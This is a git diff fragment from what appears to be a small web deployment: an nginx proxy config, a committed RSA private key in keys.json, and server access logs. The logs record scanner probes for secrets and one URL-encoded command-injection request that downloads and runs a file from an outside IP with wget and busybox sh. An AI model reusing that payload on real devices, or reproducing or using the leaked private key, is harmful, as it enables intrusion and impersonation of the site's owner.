|
||||||
|
return 400;
|
||||||
|
}
|
||||||
|
}
|
||||||
28
nginx.conf
Normal file
28
nginx.conf
Normal file
@@ -0,0 +1,28 @@
|
|||||||
|
server {
|
||||||
|
listen 80;
|
||||||
|
listen [::]:80;
|
||||||
|
server_name hanmocnn.co.kr www.hanmocnn.co.kr;
|
||||||
|
|
||||||
|
location / {
|
||||||
|
root /usr/share/nginx/html;
|
||||||
|
index index.html index.htm;
|
||||||
|
}
|
||||||
|
|
||||||
|
# API 프록시
|
||||||
|
location /api/ {
|
||||||
|
proxy_pass http://hanmo-mail-contact:8001;
|
||||||
|
proxy_http_version 1.1;
|
||||||
|
proxy_set_header Upgrade $http_upgrade;
|
||||||
|
proxy_set_header Connection 'upgrade';
|
||||||
|
proxy_set_header Host $host;
|
||||||
|
proxy_cache_bypass $http_upgrade;
|
||||||
|
proxy_set_header X-Real-IP $remote_addr;
|
||||||
|
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
||||||
|
proxy_set_header X-Forwarded-Proto $scheme;
|
||||||
|
}
|
||||||
|
|
||||||
|
error_page 500 502 503 504 /50x.html;
|
||||||
|
location = /50x.html {
|
||||||
|
root /usr/share/nginx/html;
|
||||||
|
}
|
||||||
|
}
|
||||||
BIN
npm/data/database.sqlite
Normal file
BIN
npm/data/database.sqlite
Normal file
Binary file not shown.
4
npm/data/keys.json
Normal file
4
npm/data/keys.json
Normal file
@@ -0,0 +1,4 @@
|
|||||||
|
{
|
||||||
|
"key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAhwK4mMoJrpP9ydc+6BamEtVrDqCtYeg59gBzmVnxWOg/HMcI\nwBsoQTPFtqeCiT0vj8Q/yCpXa5FyJEwmxhdXJ28KX2R2H9Y65BFW9sIhfb4hWpiM\nYCo+6RMqLxf2MUOh6K0UuXVkx7LLJmXV7PjWut768zHazYUQUhFMkwUO43yL+pDt\nBRP+WJ8tlAIxjxyUGcfPw33Y+/kC0qS9aSp4SAeHq/vKDYSE3f/BE1DqqSEBDyhd\n+5AlbelhLRc8bc4GZAIP5NJZrSeLzIe4o/azqi2J1c8eLk60wKlcl1ZLM63d7XoA\nTjEwlrXZGa9Xo58cQaPc1uK8jzxg2MlbFlPvfwIDAQABAoIBAH8TQ5akC8rjBqwV\nSeN/dd8iO3rwJ2GRCAUQ1b2QV8b8CnNWr1jJ9vCv/zd1oTr1eS/TYslPeSsJIish\n9hjbXTADpvq0fy5mINYLsBPgE0/cRl6UWQQmn0IXxMvAvPwPkXSEfI42/Z2tHuNM\nVLeQW+RV/lQrJ6vrw7nLCI0U5LeeYaE+JcuaYU2A1OK3ZEg4yODqU1AgT5BX8Cw0\n3QiQ9p3lwVwu74hQ+o8+yh5TzzNHG2T988rj/5utVcLibt/ISTr3gMO5qeWrFr2Q\nV5zzXy6BI1hXqjknViduEW0JbvoEoHZJ2Hhj8u0qSkVMkLv+Q6qCRwO4YanSgL3j\nEGKDoVkCgYEAz/s1lVtDVoGzy4cm7Ge7OvVSKF/FGw0VVefGr5dINtKrMLh3Xxwz\nX7O6N2or4U3tiWGsiajD3hxak1gzFHXmHn3AEHaANKtRdYBEMjsioqN/4HQids0g\n4MV3Tm5HvWh4Ynec8cLrbjUrf3bhR0g0HaHHkfgSm/8OEbZFcpj78xsCgYEApi6P\nqJ3XW8OjMKprMjscEePqhj2c2Jt+rAIKoBBmtLhhILjO960dsDnw5yMyHqM//WCg\nUXALcgl+1BKNiS8aDkqHp4r/FN7BYWZeH1YA5lFXgG4qjshZPsxE7B7kz9uNwNaY\n6bLEdgj0jMJBVVE5qvFC2zYiTEV6ZBD/mN4CF20CgYBajW95BfE9mt8jQEbsKwXT\n17fbqEbzTjD55B4XmXBxniu23LnsiSS9CE2NjwZn5DwF0qcCkJ4m+IVfHcmvoN1+\nbRXQlSegxu6CkEQg8qpT0Yf9u9K9kvY7pv4ZAd7uUqwHgzir8kf7Bd9YcfQHyyIV\nvLhdj3ravKPthkSabo1T/QKBgEhnfPwQWWaH5LAtcCsgiehZjzMR4SaXCSfUc+Ct\nhLI0q0zgeHx9FrRTalyqfwnOQvEYioEw+iuja3jm5Hfi581WN6iN7Pmg3Eydl2C7\nzgSLaD5ywWQYcpnj0hu2kibmF+rvFQytcN+kozg44tJTY3bRSznLakIk+2Bh75sh\nD3Q5AoGAMAj/169Q+fw7fCLEkNO7zEbpv7qoQraG1e0JPwjpgFhvxzbW+pmJ1R+I\nyis+12IrXyO1KgDj4L6YSG65PkKv2tsYgIuAl5/TQYAL00rIyrBFMu71XiI5ihPK\n8UdwqsQWMwQcQ1SfbMm9YvkiMbxN5OXQvWCQe/nke9UfjV/Epf4=\n-----END RSA PRIVATE KEY-----",
|
||||||
|
"pub": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAhwK4mMoJrpP9ydc+6Bam\nEtVrDqCtYeg59gBzmVnxWOg/HMcIwBsoQTPFtqeCiT0vj8Q/yCpXa5FyJEwmxhdX\nJ28KX2R2H9Y65BFW9sIhfb4hWpiMYCo+6RMqLxf2MUOh6K0UuXVkx7LLJmXV7PjW\nut768zHazYUQUhFMkwUO43yL+pDtBRP+WJ8tlAIxjxyUGcfPw33Y+/kC0qS9aSp4\nSAeHq/vKDYSE3f/BE1DqqSEBDyhd+5AlbelhLRc8bc4GZAIP5NJZrSeLzIe4o/az\nqi2J1c8eLk60wKlcl1ZLM63d7XoATjEwlrXZGa9Xo58cQaPc1uK8jzxg2MlbFlPv\nfwIDAQAB\n-----END PUBLIC KEY-----"
|
||||||
|
}
|
||||||
0
npm/data/logs/fallback_error.log
Normal file
0
npm/data/logs/fallback_error.log
Normal file
94
npm/data/logs/fallback_http_access.log
Normal file
94
npm/data/logs/fallback_http_access.log
Normal file
@@ -0,0 +1,94 @@
|
|||||||
|
[14/Feb/2026:21:47:47 +0000] 200 - GET http www.hanmocnn.co.kr "/" [Client 172.17.0.1] [Length 1033] [Gzip -] "curl/8.5.0" "-"
|
||||||
|
[14/Feb/2026:21:50:30 +0000] 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/159751378329916" [Client 222.117.41.51] [Length 150] [Gzip -] "curl/8.12.1" "-"
|
||||||
|
[14/Feb/2026:21:53:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.135.211.148] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
|
||||||
|
[14/Feb/2026:22:32:24 +0000] 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/31481293126031" [Client 222.117.41.51] [Length 150] [Gzip -] "curl/8.12.1" "-"
|
||||||
|
[14/Feb/2026:22:41:34 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:22:53:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[14/Feb/2026:22:57:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-"
|
||||||
|
[14/Feb/2026:23:00:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.200.94] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:00:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.200.94] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:00:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.200.94] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:09:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[14/Feb/2026:23:16:43 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 213.209.159.181] [Length 183] [Gzip 3.21] "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:18:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[14/Feb/2026:23:26:45 +0000] 404 - POST http 222.117.41.51 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.151%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc" [Client 130.12.180.151] [Length 122] [Gzip 1.35] "Mozila/5.0" "-"
|
||||||
|
[14/Feb/2026:23:33:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.213.72] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:33:45 +0000] 400 - - http localhost "-" [Client 142.93.0.66] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:33:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.213.72] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:33:45 +0000] 400 - - http localhost "-" [Client 142.93.0.66] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:33:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.213.72] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:33:46 +0000] 400 - GET http mail.hanmocnn.co.kr "/" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:47 +0000] 400 - GET http mail.hanmocnn.co.kr "/server" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:48 +0000] 400 - GET http mail.hanmocnn.co.kr "/server-status" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:50 +0000] 400 - GET http mail.hanmocnn.co.kr "/about" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:51 +0000] 400 - GET http mail.hanmocnn.co.kr "/login.action" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:52 +0000] 400 - GET http mail.hanmocnn.co.kr "/v2/_catalog" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:52 +0000] 400 - GET http mail.hanmocnn.co.kr "/.DS_Store" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:53 +0000] 400 - GET http mail.hanmocnn.co.kr "/.env" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:55 +0000] 400 - GET http mail.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:57 +0000] 400 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:58 +0000] 400 - POST http mail.hanmocnn.co.kr "/graphql" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:59 +0000] 400 - POST http mail.hanmocnn.co.kr "/api" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:59 +0000] 400 - POST http mail.hanmocnn.co.kr "/api/graphql" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:00 +0000] 400 - POST http mail.hanmocnn.co.kr "/graphql/api" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:00 +0000] 400 - POST http mail.hanmocnn.co.kr "/api/gql" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:00 +0000] 400 - GET http mail.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:01 +0000] 400 - GET http mail.hanmocnn.co.kr "/config.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:03 +0000] 400 - GET http mail.hanmocnn.co.kr "/telescope/requests" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:04 +0000] 400 - GET http mail.hanmocnn.co.kr "/info.php" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:05 +0000] 400 - GET http mail.hanmocnn.co.kr "/.well-known/security.txt" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:06 +0000] 400 - GET http mail.hanmocnn.co.kr "/actuator/env" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:08 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger-ui.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:09 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger/index.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:10 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:11 +0000] 400 - GET http mail.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:12 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:13 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:14 +0000] 400 - GET http mail.hanmocnn.co.kr "/v2/api-docs" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:15 +0000] 400 - GET http mail.hanmocnn.co.kr "/v3/api-docs" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:16 +0000] 400 - GET http mail.hanmocnn.co.kr "/api-docs/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:17 +0000] 400 - GET http mail.hanmocnn.co.kr "/api/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:18 +0000] 400 - GET http mail.hanmocnn.co.kr "/@vite/env" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:19 +0000] 400 - GET http mail.hanmocnn.co.kr "/.vscode/sftp.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:20 +0000] 400 - OPTIONS http mail.hanmocnn.co.kr "/" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:21 +0000] 400 - GET http mail.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:22 +0000] 400 - GET http mail.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:37:17 +0000] 404 - GET http 222.117.41.51 "/login.asp" [Client 195.3.221.86] [Length 150] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-"
|
||||||
|
[14/Feb/2026:23:47:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[14/Feb/2026:23:54:55 +0000] 400 - GET http 222.117.41.51 "/" [Client 106.117.108.193] [Length 252] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:55:08 +0000] 400 - - http localhost "-" [Client 182.138.158.204] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:55:21 +0000] 400 - GET http 222.117.41.51 "/" [Client 118.212.122.192] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:55:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 175.19.74.90] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:56:03 +0000] 400 - GET http 222.117.41.51 "/" [Client 123.191.128.215] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:59:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.22.1.1] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:59:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.22.1.1] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[14/Feb/2026:23:59:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.22.1.1] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:00:03:27 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:00:04:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:00:04:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 222.117.41.51] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:00:05:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 178.16.54.17] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:00:08:19 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:12:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:00:18:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:00:34:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:00:40:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 568] [Gzip 1.86] "-" "-"
|
||||||
|
[15/Feb/2026:00:59:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:01:03:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:01:12:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-"
|
||||||
|
[15/Feb/2026:01:19:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:01:27:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:01:37:47 +0000] 400 - GET http 222.117.41.51 "/page/style/index.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:50:01 +0000] 200 - GET http git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:50:01 +0000] 400 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:52:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.231.238] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:52:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.231.238] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:52:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.231.238] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:54:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:01:54:31 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:55:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 2.58.56.62] [Length 0] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:01:59:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 44.211.135.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:00:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
|
[15/Feb/2026:02:00:59 +0000] 400 - GET https localhost "/" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-"
|
||||||
|
[15/Feb/2026:02:05:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 162.216.150.206] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
|
||||||
|
[15/Feb/2026:02:08:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-"
|
||||||
5
npm/data/logs/fallback_http_error.log
Normal file
5
npm/data/logs/fallback_http_error.log
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
2026/02/14 21:50:30 [error] 200#200: *7 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/159751378329916" failed (2: No such file or directory), client: 222.117.41.51, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/159751378329916 HTTP/1.1", host: "mail.hanmocnn.co.kr"
|
||||||
|
